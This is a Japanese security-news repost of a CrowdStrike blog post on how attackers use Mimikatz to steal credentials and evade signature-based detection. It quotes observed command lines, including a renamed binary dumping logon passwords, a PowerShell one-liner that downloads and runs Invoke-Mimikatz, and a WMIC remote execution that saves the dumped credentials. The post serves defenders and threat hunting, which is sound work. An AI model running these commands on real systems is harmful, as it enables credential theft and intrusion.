CrowdStrike Blog:「サイバー界のAK47」、Mimikatzを利用したシグネチャベースの検知回避 | ScanNetSecurity
2020.07.05(日)
コンテンツ
注目検索ワード
ホーム 国際 海外情報 記事

CrowdStrike Blog:「サイバー界のAK47」、Mimikatzを利用したシグネチャベースの検知回避

今回は、オープンソースツールのMimikatzが攻撃者にどのように利用されているかについて、CrowdStrike Falcon OverWatchチームが確認した例をいくつかご紹介します。

国際 海外情報
 今回は、オープンソースツールのMimikatzが攻撃者にどのように利用されているかについて、CrowdStrike Falcon OverWatchチームが確認した例をいくつかご紹介します。中にはシグネチャベースの検知を回避するためにMimikatzが使われた珍しいケースもあります。

 OverWatchチームは、お客様のインフラストラクチャに対して試みられた攻撃を総合的に可視化しています。この可視化は多岐にわたるお客様の業種・規模を網羅しています。OverWatchチームは、Falconエンドポイントセキュリティプラットフォームが提供するシステムの可視化を用いて、悪意のあるアクティビティを広範囲に観測しています。

権限昇格に使用する認証情報へのアクセス

 悪意のあるアクティビティでよく見られるのが、認証情報へのアクセスです。多くの場合、攻撃者は権限を昇格してインフラストラクチャ内のアクセス可能な領域を広げるために、さまざまな手段を使って有効な認証情報を探します。OverWatchチームは、攻撃者が標的とした1人のユーザーに対して、認証情報を盗み取るために複数の手法を用いていたケースを確認しています(認証情報の窃取を狙った悪意のあるアクティビティで複数の手法が使用された例は、「2018年版 Falcon OverWatch Report」で紹介しています)。

Mimikatzの手法

 認証情報にアクセスする一般的な方法に、Mimikatzの使用が挙げられます。CrowdStrikeの共同創業者で最高技術責任者(CTO)のDmitri Alperovitchは、Mimikatzを「サイバー界のAK47」と呼んでいます。OverWatchチームは、標的型攻撃とペネトレーションテスト(侵入テスト)のいずれにおいてもMimikatzが使われていることを頻繁に観測しています。

実行ファイル名の変更

 Mimikatzを使用した最も単純で直接的な手法は、侵害したシステムにMimikatzをコピーし、実行ファイルの名前を変更し、以下のようなコマンドラインを使用して起動することです。

c:\ProgramData\p.exe ""privilege::debug""
""sekurlsa::logonpasswords""

 これにより攻撃者は、システム上の認証情報にアクセスできるようになります。

バッチファイルの使用

 Mimikatzを起動する別の方法でこれまでに確認されているものには、バッチファイルを使用して標的となるシステムにMimikatzをコピーし、それを起動してアウトプットをファイルに送信し、その出力ファイルを元の一元的な収集ポイントにコピーして、最後に標的となったシステムから関連ファイルをすべて削除する方法などがあります。

PowerShellの亜種を使用

 OverWatchのアナリストがこれまでに確認した認証情報にアクセスするためのその他の方法には、次のような、Mimikatz用に改変したPowerShellを使用した例があります。

powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswordsexit'

コマンドラインオプションの変更

 2018年第4四半期には、Mimikatzを使用した別の方法をOverWatchのアナリストが確認しています。具体的には、コマンドラインオプションを変更するように改変されたケースです。

mnl.exe pr::dg sl::lp et -p

 このMimikatzの特定の亜種は、以下に示すように、標的とした複数のシステムに対してWMIC.exeを使用して実行されます。

Wmic /NODE:"[REDACTED]" /USER:"[REDACTED]" /password:[REDACTED] process call create "cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\PList.txt) >>
c:\windows\temp\temp.txt"

IOAの監視が必須

 これらの手法は明らかに実行ファイルのコマンドラインオプションを参照してその目的を推測したり、バイナリファイル内に関連する文字列が存在するかどうかを確認することだけに頼る脆弱な検知アプローチを回避することを狙ったものと言えます。攻撃者はさまざまな手法を使って認証情報にアクセスする可能性がありますが、Falconプラットフォームは、検知メカニズムを回避または妨害する目的で新しい手法が使用されている場合にも確認できる可視水準を提供します。

 ファイル名、ハッシュ、単一のコマンドラインオプションなどの典型的な攻撃の痕跡(IOC)に注目するだけでなく、攻撃者の行動にフォーカスした攻撃の痕跡(IOA)を監視することの重要性が、さらに明らかになっています。

その他のリソース

「2019 CrowdStrike Global Threat Report:Adversary Tradecraft and the Importance of Speed」をダウンロードしてご覧ください

「2018年版 CrowdStrike Falcon OverWatch Report 脅威ハンティングの最前線」をダウンロードしてご覧ください

・CrowdStrikeの次世代アンチウイルス(AV)を実際にお試しいただけます。今すぐFalcon Preventの無料トライアル版をお試しください

*原文はCrowdStrike Blog サイト掲載 :https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/
《Harlan Carvey (CrowdStrike)》

ソース・関連リンク

関連記事

Scan PREMIUM 会員限定記事

もっと見る

Scan PREMIUM 会員限定記事特集をもっと見る

カテゴリ別新着記事

脆弱性と脅威 記事一覧へ

LinuxKI の kivis.php における OS コマンドインジェクションの脆弱性(Scan Tech Report) 画像

LinuxKI の kivis.php における OS コマンドインジェクションの脆弱性(Scan Tech Report)
クラウド侵害の半数近くがホストアプリを経由(日本IBM) 画像

クラウド侵害の半数近くがホストアプリを経由(日本IBM)
サイボウズ「Garoon」に複数の脆弱性(JVN) 画像

サイボウズ「Garoon」に複数の脆弱性(JVN)
国税庁「e-Tax受付システムAP」にコマンド実行の脆弱性(JVN) 画像

国税庁「e-Tax受付システムAP」にコマンド実行の脆弱性(JVN)
復号代金だけでなくデータ漏えいでも脅迫「暴露型ランサムウェア」の手口と対応例(マクニカネットワークス) 画像

復号代金だけでなくデータ漏えいでも脅迫「暴露型ランサムウェア」の手口と対応例(マクニカネットワークス)
ECプラットフォーム Adobe「Magento」に複数の脆弱性、アップデートを呼びかけ(JPCERT/CC) 画像

ECプラットフォーム Adobe「Magento」に複数の脆弱性、アップデートを呼びかけ(JPCERT/CC)

インシデント・事故 記事一覧へ

「道具屋さん本店」に不正アクセス、約5ヶ月分のカード決済情報が流出(エース産業機器) 画像

「道具屋さん本店」に不正アクセス、約5ヶ月分のカード決済情報が流出(エース産業機器)
LINEプロフィール画像改ざん事件、脆弱性検証から逸脱した行為と判断(LINE) 画像

LINEプロフィール画像改ざん事件、脆弱性検証から逸脱した行為と判断(LINE)
ABEイニシアティブポータルサイト、サイト開設時から44回の不正アクセスが新たに判明(JICE) 画像

ABEイニシアティブポータルサイト、サイト開設時から44回の不正アクセスが新たに判明(JICE)
海外グループ会社メールアカウントに不正アクセス、迷惑メール送信(古野電気) 画像

海外グループ会社メールアカウントに不正アクセス、迷惑メール送信(古野電気)
自宅での作業用に254件のアドレス記載したメールを誤送信(横浜市) 画像

自宅での作業用に254件のアドレス記載したメールを誤送信(横浜市)
「GEKIROCK CLOTHING」への不正アクセス最終報、カード情報321件が流出の可能性(激ロックエンタテインメント) 画像

「GEKIROCK CLOTHING」への不正アクセス最終報、カード情報321件が流出の可能性(激ロックエンタテインメント)

調査・レポート・白書 記事一覧へ

金融機関でのセキュリティ対策やシステム障害など3つのレポートを公開(金融庁) 画像

金融機関でのセキュリティ対策やシステム障害など3つのレポートを公開(金融庁)
家庭内で安全快適に在宅勤務を行うためのリファレンスガイドの公開について(ICT-ISAC) 画像

家庭内で安全快適に在宅勤務を行うためのリファレンスガイドの公開について(ICT-ISAC)
マルウェアの3分の2が暗号化、四半期レポート(ウォッチガード) 画像

マルウェアの3分の2が暗号化、四半期レポート(ウォッチガード)
新型コロナ関連攻撃の約8割がフィッシング--四半期動向(NTTデータ) 画像

新型コロナ関連攻撃の約8割がフィッシング--四半期動向(NTTデータ)
サイバーパンフレット サイバー攻撃の現状 2020(公安調査庁) 画像

サイバーパンフレット サイバー攻撃の現状 2020(公安調査庁)
外交や安全保障、経済政策などの組織や人物に標的型攻撃--J-CRATレポート(IPA) 画像

外交や安全保障、経済政策などの組織や人物に標的型攻撃--J-CRATレポート(IPA)

研修・セミナー・カンファレンス 記事一覧へ

製品レビュー:北朝鮮 国産アンチウイルスソフト4種 画像

製品レビュー:北朝鮮 国産アンチウイルスソフト4種
CODE BLUE 2020、参加費無料でオンライン開催(CODE BLUE 実行委員会) 画像

CODE BLUE 2020、参加費無料でオンライン開催(CODE BLUE 実行委員会)
ネットを楽しく利用するための注意点をテーマに動画コンテスト開催(トレンドマイクロ) 画像

ネットを楽しく利用するための注意点をテーマに動画コンテスト開催(トレンドマイクロ)
ひとつのエージェントで多機能を実現、解説セミナー(CrowdStrike) 画像

ひとつのエージェントで多機能を実現、解説セミナー(CrowdStrike)
募集開始2時間で満席になった人気フォレンジック勉強会、第2回開催(イエラエセキュリティ) 画像

募集開始2時間で満席になった人気フォレンジック勉強会、第2回開催(イエラエセキュリティ)
打つ手はあるのか、BEC(ビジネスメール詐欺)とオレオレ詐欺の境界が崩壊 画像

打つ手はあるのか、BEC(ビジネスメール詐欺)とオレオレ詐欺の境界が崩壊

製品・サービス・業界動向 記事一覧へ

GitHubのコードレビューを自動化、工数を大幅削減する「Sider」提供開始(マクニカネットワークス) 画像

GitHubのコードレビューを自動化、工数を大幅削減する「Sider」提供開始(マクニカネットワークス)
フィッシング詐欺の予防から被害時の対応までワンストップでサポート(NTTドコモ) 画像

フィッシング詐欺の予防から被害時の対応までワンストップでサポート(NTTドコモ)
遭遇したインシデントも盛り込む、NTTドコモのクラウド利用ノウハウ集「ドコモ・クラウドパッケージ」 画像

遭遇したインシデントも盛り込む、NTTドコモのクラウド利用ノウハウ集「ドコモ・クラウドパッケージ」
子供にスマホを持たせる親へのハンドブックを無償提供(トレンドマイクロ) 画像

子供にスマホを持たせる親へのハンドブックを無償提供(トレンドマイクロ)
オンラインで受験可能、脆弱性診断ツール「Vex」の認定実技試験(ユービーセキュア) 画像

オンラインで受験可能、脆弱性診断ツール「Vex」の認定実技試験(ユービーセキュア)
脆弱性情報を一元化しランキング形式で閲覧できるサブスクサービス(エイチ・シー・ネットワークス) 画像

脆弱性情報を一元化しランキング形式で閲覧できるサブスクサービス(エイチ・シー・ネットワークス)

おしらせ 記事一覧へ

上野編集長就任10周年記念オンライン飲み会 7月17日開催(ScanNetSecurity) 画像

上野編集長就任10周年記念オンライン飲み会 7月17日開催(ScanNetSecurity)
上野宣 編集長就任10周年記念オンライン飲み会、Scan PREMIUM「宣ベロ」ライセンスキャンペーン実施(イード) 画像

上野宣 編集長就任10周年記念オンライン飲み会、Scan PREMIUM「宣ベロ」ライセンスキャンペーン実施(イード)
上野宣から編集長就任10周年の御礼 画像

上野宣から編集長就任10周年の御礼
ScanNetSecurity 創刊21周年御礼の辞(上野宣) 画像

ScanNetSecurity 創刊21周年御礼の辞(上野宣)
編集部海外取材土産プレゼント 2019 画像

編集部海外取材土産プレゼント 2019
[鋭意準備中] ScanNetSecurity に夏を告げる紳士を取材しました ~ Black Hat USA 2019 の見どころ 画像

[鋭意準備中] ScanNetSecurity に夏を告げる紳士を取材しました ~ Black Hat USA 2019 の見どころ
Page Top
★★ ( FB ログイン可) 会員限定記事、週 1 回のメルマガ、人気ニュースランキング、特集一覧をお届け…無料会員登録はアドレスのみで所要 1 分程度 ★★
★★ ( FB ログイン可) 会員限定記事、週 1 回のメルマガ、人気ニュースランキング、特集一覧をお届け…無料会員登録はアドレスのみで所要 1 分程度 ★★

登録すれば、記事一覧、人気記事ランキング、BASIC 会員限定記事をすべて閲覧できます。毎週月曜朝には一週間のまとめメルマガをお届けします(BASIC 登録後 PREMIUM にアップグレードすれば全ての限定コンテンツにフルアクセスできます)。
×